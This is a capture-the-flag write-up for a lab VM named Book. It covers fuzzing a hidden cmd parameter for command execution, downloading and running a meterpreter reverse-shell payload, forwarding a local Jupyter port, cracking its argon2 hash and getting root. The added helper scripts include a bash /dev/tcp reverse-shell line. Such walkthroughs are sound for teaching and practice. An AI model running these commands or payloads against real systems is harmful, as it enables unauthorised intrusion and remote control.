Port scanning

┌──(kali㉿kali)-[~/HMV/book]
└─$ sudo nmap -p- 192.168.43.12
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-15 15:36 CST
Nmap scan report for Book (192.168.43.12)
Host is up (0.0015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: C6:08:CB:68:1C:66 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.33 seconds

Web penetration

Ports 80 and 443 are open. Visiting port 80 redirects to HTTPS, and behind it is an open-source csTimer, a timer used for speedcubing practice:

image1

At first I spent quite a while on the web side but could not find an entry point anywhere.

Later, after reading a group member's writeup, I found that the main page hides a parameter, cmd, that gives command execution. You have to fuzz it out yourself; I really had not expected that.

Fuzz it and see:

┌──(kali㉿kali)-[~/HMV/book]
└─$ wfuzz -u 'http://192.168.43.12/?FUZZ=id' -w /usr/share/wordlists/fuzzDicts/paramDict/AllParam.txt --hh 54850
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.43.12/?FUZZ=id
Total requests: 74332

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000002798: 200 358 L 4242 W 54903 Ch "cmd"

The fuzzing turns up a cmd parameter whose response differs from all the others (54903 characters instead of the 54850 filtered out with --hh). Requesting it shows command output appended to the page:

┌──(kali㉿kali)-[~/HMV/book]
└─$ curl 'http://192.168.43.12?cmd=id'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html manifest="cache.manifest">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="default">
<meta name="format-detection" content="telephone=no">
…………
…………
</tbody></table>
</body></html>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
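As an added example (my own helpers, not part of the original writeup or of csTimer), the POSIX shell functions below wrap the cmd parameter found above so commands can be sent with proper percent-encoding, the command output can be separated from the page HTML that precedes it, and the wfuzz baseline-length filter can be reproduced with curl. The target URL is the one from the scan; the function names are mine. That output is appended after the closing </html> line is taken from the curl response above. That an unencoded '&' or space in a GET query truncates the injected command is a general fact about URLs and is offered as one plausible reason for the failed reverse shells mentioned in the next section, not as something the writeup established.

```shell
#!/bin/sh
# Added example, not from the original writeup.
# Helpers for driving the ?cmd= injection point on the Book machine with curl.
LC_ALL=C
export LC_ALL
TARGET="${TARGET:-http://192.168.43.12}"   # taken from the nmap scan above

# Percent-encode every byte of $1 except RFC 3986 unreserved characters.
# Spaces, '/', '>', '&' and quotes are encoded: a raw '&' in a GET query ends
# the cmd value, so a bash -i >& /dev/tcp/... one-liner pasted straight into
# the URL is silently cut short (assumed cause, not proven on this box).
urlencode() {
  s=$1
  out=""
  while [ -n "$s" ]; do
    rest=${s#?}
    c=${s%"$rest"}
    case $c in
      [A-Za-z0-9._~-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;
    esac
    s=$rest
  done
  printf '%s' "$out"
}

# Print everything after the closing </html> line of a response read on stdin.
# Assumption: the page appends the command output after the normal document,
# as the curl output above shows.
extract_output() {
  awk 'found { print } /<\/html>/ { found = 1 }'
}

# Run one command through the injection point and show only its output.
rce() {
  curl -s "$TARGET/?cmd=$(urlencode "$1")" | extract_output
}

# Baseline-length filter, the same idea as wfuzz --hh above: request ?NAME=id
# for every candidate in a wordlist and report the ones whose body size differs
# from the first (assumed benign) candidate.
fuzz_params() {
  wordlist=$1
  baseline=""
  while IFS= read -r name; do
    [ -n "$name" ] || continue
    size=$(curl -s -o /dev/null -w '%{size_download}' \
      "$TARGET/?$(urlencode "$name")=id")
    if [ -z "$baseline" ]; then
      baseline=$size
      continue
    fi
    if [ "$size" != "$baseline" ]; then
      printf '%s %s\n' "$name" "$size"
    fi
  done < "$wordlist"
}

# Usage (needs the live target): sh rce.sh 'id'
#                                sh rce.sh 'cat /etc/passwd'
if [ $# -gt 0 ]; then
  rce "$*"
fi
```

With urlencode in place a bash reverse shell can be sent as rce 'bash -c "bash -i >& /dev/tcp/192.168.43.68/4444 0>&1"' and the whole string reaches the target intact; whether that particular shell works on this box is not something the writeup tested, so the meterpreter route below remains the one that was confirmed.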

Getting a foothold

I then tried to get a reverse shell, but neither busybox nc nor a plain bash reverse shell came back, so I decided to upload a meterpreter payload instead:

┌──(kali㉿kali)-[~/HMV/book]
└─$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.43.68 LPORT=4444 -f elf -o payload
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068952 bytes
Final size of elf file: 1068952 bytes
Saved as: payload

┌──(kali㉿kali)-[~/HMV/book]
└─$ file payload
payload: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, with debug_info, not stripped

Start an http.server and use the command execution to pull the payload onto the target:

┌──(kali㉿kali)-[~/HMV/book]
└─$ python3 -m http.server
┌──(kali㉿kali)-[~/HMV/book]
└─$ curl 'http://192.168.43.12?cmd=cd%20/tmp;wget%20http://192.168.43.68:8000/payload'

Then, in msf, start the listener for the meterpreter reverse connection:

┌──(kali㉿kali)-[~/HMV/book]
└─$ msfconsole
Metasploit tip: View missing module options with show missing


. .
.

dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB

dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP

.
.
o To boldly go where no
shell has gone before


=[ metasploit v6.4.56-dev ]
+ -- --=[ 2505 exploits - 1291 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (linux/x64/meterpreter_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.43.68
LHOST => 192.168.43.68
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.43.68:4444

Be sure to set the payload to the one we generated with msfvenom. The default payload is generic/shell_reverse_tcp; if you leave it, the handler prints "Command shell session 9 is not valid and will be closed" when the callback arrives, and no shell comes back.

Then run the uploaded payload on the target:

┌──(kali㉿kali)-[~/HMV/book]
└─$ curl 'http://192.168.43.12?cmd=chmod%20+x%20/tmp/payload;/tmp/payload'

The session then comes back in msf:

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.43.68:4444
[*] Meterpreter session 1 opened (192.168.43.68:4444 -> 192.168.43.12:56318) at 2025-08-15 16:25:24 +0800

meterpreter > shell
Process 2270 created.
Channel 1 created.
whoami
www-data

Privilege escalation

Looking at the listening ports on the target, there is an extra port, 8888, bound to localhost only:

www-data@Book:~/html$ ss -tuln
ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:8888 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 128 *:443 *:*
www-data@Book:~/html$

Using the portfwd that is built into msf, forward the target's port 8888 out to the attacking machine:

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-h Help banner.
-i Index of the port forward entry to interact with (see the "list" command).
-l Forward: local port to listen on. Reverse: local port to connect to.
-L Forward: local host to listen on (optional). Reverse: local host to connect to.
-p Forward: remote port to connect to. Reverse: remote port to listen on.
-r Forward: remote host to connect to.
-R Indicates a reverse port forward.

meterpreter > portfwd add -l 8888 -p 8888 -r 127.0.0.1
[*] Forward TCP relay created: (local) :8888 -> (remote) 127.0.0.1:8888
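As an added example (my own code, not from the original writeup or from Metasploit), the shell snippet below automates the step just taken: it reads ss -tuln output, keeps only sockets bound to loopback, which an external nmap scan can never see, and prints the matching meterpreter portfwd line for each one. SAMPLE is the ss output captured on the target above, embedded so the functions run offline; the --live switch and the function names are mine.

```shell
#!/bin/sh
# Added example, not from the original writeup.
# Find loopback-only listeners in `ss -tuln` output and emit portfwd commands.

# ss -tuln output captured on the target above, embedded for offline use.
SAMPLE='Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0      0.0.0.0:68          0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.1:8888      0.0.0.0:*
tcp   LISTEN 0      128    *:80                *:*
tcp   LISTEN 0      128    [::]:22             [::]:*
tcp   LISTEN 0      128    *:443               *:*'

# Read ss -tuln output on stdin; print "proto port" for every tcp LISTEN or
# udp socket whose local address is 127.0.0.0/8 or [::1].
# Column 5 is "Local Address:Port"; the port is whatever follows the last ':'
# so that bracketed IPv6 addresses are handled too.
loopback_listeners() {
  awk '
    ($1 == "tcp" && $2 == "LISTEN") || $1 == "udp" {
      addr = $5
      n = split(addr, parts, ":")
      port = parts[n]
      host = substr(addr, 1, length(addr) - length(port) - 1)
      if (host ~ /^127\./ || host == "[::1]")
        print $1, port
    }'
}

# Turn "tcp PORT" lines into the meterpreter portfwd command used above
# (same local and remote port, relayed to the target's own loopback).
portfwd_commands() {
  while read -r proto port; do
    [ "$proto" = tcp ] || continue
    printf 'portfwd add -l %s -p %s -r 127.0.0.1\n' "$port" "$port"
  done
}

# Usage: sh loopback.sh          -> runs against the embedded sample
#        sh loopback.sh --live   -> runs ss -tuln on the current host
if [ "${1-}" = "--live" ]; then
  ss -tuln | loopback_listeners | portfwd_commands
else
  printf '%s\n' "$SAMPLE" | loopback_listeners | portfwd_commands
fi
```

Run on the sample it prints the single line portfwd add -l 8888 -p 8888 -r 127.0.0.1, i.e. exactly the command issued in the meterpreter session above. On a real host the same filter also surfaces things like 127.0.0.53:53 (systemd-resolved), so review the list rather than forwarding everything.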

Then browse to 127.0.0.1:8888 locally:

image2

It is a Jupyter login page. I tried a few weak passwords; none of them worked.

The password might be stashed somewhere on the target, so search for files related to jupyter:

www-data@Book:~/html$ find / -name '*jupyter*' 2>/dev/null
…………
…………
/var/backups/jupyter_server_config.json
www-data@Book:~/html$

That turns up the config file; take a look at it:

www-data@Book:~/html$ cat /var/backups/jupyter_server_config.json
cat /var/backups/jupyter_server_config.json
{
"IdentityProvider": {
"hashed_password": "argon2:$argon2id$v=19$m=10240,t=10,p=8$FLuM1EM1nn/EP9ni1ust1A$BSnZUgXixY8B0Tzmffcz/9Zo9cvEO/PeAu8zw/iYNI4"
}
}www-data@Book:~/html$

It contains an argon2 password hash. I found a script online (https://github.com/p0dalirius/Argon2Cracker/blob/main/Argon2Cracker.py) and used it to crack the hash:

┌──(kali㉿kali)-[~/Tools/Argon2_Cracker]
└─$ python3 Argon2Cracker.py -w 5000.txt -v '$argon2id$v=19$m=10240,t=10,p=8$FLuM1EM1nn/EP9ni1ust1A$BSnZUgXixY8B0Tzmffcz/9Zo9cvEO/PeAu8zw/iYNI4'
/home/kali/Tools/Argon2_Cracker/Argon2Cracker.py:18: SyntaxWarning: invalid escape sequence '\$'
matched = re.search('^\$(argon2(i|d|id))\$v=([0-9]+)\$([tpm=0-9,]+)\$([a-zA-Z0-9/\+]+)\$([a-zA-Z0-9/\+]+)', hash)
Argon2Cracker - v1.0 - by Remi GASCOU (Podalirius)

[>] Loading wordlist ... done. (5000 candidates loaded)
Version: 19
Params: m=10240,t=10,p=8
Salt: FLuM1EM1nn/EP9ni1ust1A
Hash: BSnZUgXixY8B0Tzmffcz/9Zo9cvEO/PeAu8zw/iYNI4

[2025/08/15 15h10m21s] Status (4494/5000) 89.88 % | Rate 44 H/s
[>] Found: star123
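As an added example (my own shell code, not from the writeup or from Argon2Cracker), the snippet below splits the value from jupyter_server_config.json into the same fields the cracker prints above: variant, version, parameters, salt and hash. The hash string is the one from the config file; note that the leading "argon2:" is Jupyter's own tag, which has to be stripped before the remaining PHC-format string is handed to a cracker, which is why the command above is run on the part starting at $argon2id. The function names are mine.

```shell
#!/bin/sh
# Added example, not from the original writeup.
# Parse the Argon2 PHC string stored by Jupyter into its components.

# Value copied from /var/backups/jupyter_server_config.json above.
HASH='argon2:$argon2id$v=19$m=10240,t=10,p=8$FLuM1EM1nn/EP9ni1ust1A$BSnZUgXixY8B0Tzmffcz/9Zo9cvEO/PeAu8zw/iYNI4'

# Drop Jupyter's "argon2:" tag if present; what remains is the PHC string.
strip_prefix() {
  printf '%s' "${1#argon2:}"
}

# Print one field of a PHC string: variant, version, params, salt or hash.
# "$argon2id$v=19$m=...,t=...,p=...$SALT$HASH" splits on '$' into an empty
# leading field followed by those five.
phc_field() {
  printf '%s' "$(strip_prefix "$2")" | awk -v want="$1" -F '[$]' '{
    if (want == "variant")      print $2
    else if (want == "version") { sub(/^v=/, "", $3); print $3 }
    else if (want == "params")  print $4
    else if (want == "salt")    print $5
    else if (want == "hash")    print $6
  }'
}

# Extract one numeric parameter (m, t or p) from the "m=...,t=...,p=..." field.
param_value() {
  printf '%s\n' "$2" | tr ',' '\n' | sed -n "s/^$1=//p"
}

phc=$(strip_prefix "$HASH")
params=$(phc_field params "$HASH")
printf 'PHC string for crackers: %s\n' "$phc"
printf 'Variant: %s\nVersion: %s\nParams: %s\nSalt: %s\nHash: %s\n' \
  "$(phc_field variant "$HASH")" "$(phc_field version "$HASH")" \
  "$params" "$(phc_field salt "$HASH")" "$(phc_field hash "$HASH")"
# m is the memory cost in KiB per guess, t the number of passes, p the lanes;
# these are what make the 44 H/s rate above so low compared with fast hashes.
printf 'Memory per guess: %s KiB, passes: %s, lanes: %s\n' \
  "$(param_value m "$params")" "$(param_value t "$params")" \
  "$(param_value p "$params")"
```

The salt and hash fields are unpadded base64, as the PHC format requires, so they are passed through untouched; a cracker decodes them itself. With m=10240 and t=10 each guess costs about 10 MiB of memory and ten passes, which is why a 5000-word list already takes on the order of two minutes at the rate shown above and why a short, targeted wordlist is the right first move against Argon2.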

The cracked password is star123. Log in on port 8888:

image3

Once in, the root flag is right there.

Then, from the File menu, you can create a Terminal, which runs directly as root:

image4

image5

user flag: flag{user-a81e1f271bc4a3dd4ac87827da4d0a78}
root flag: flag{root-4f98663772651c870e911982e991d0d9}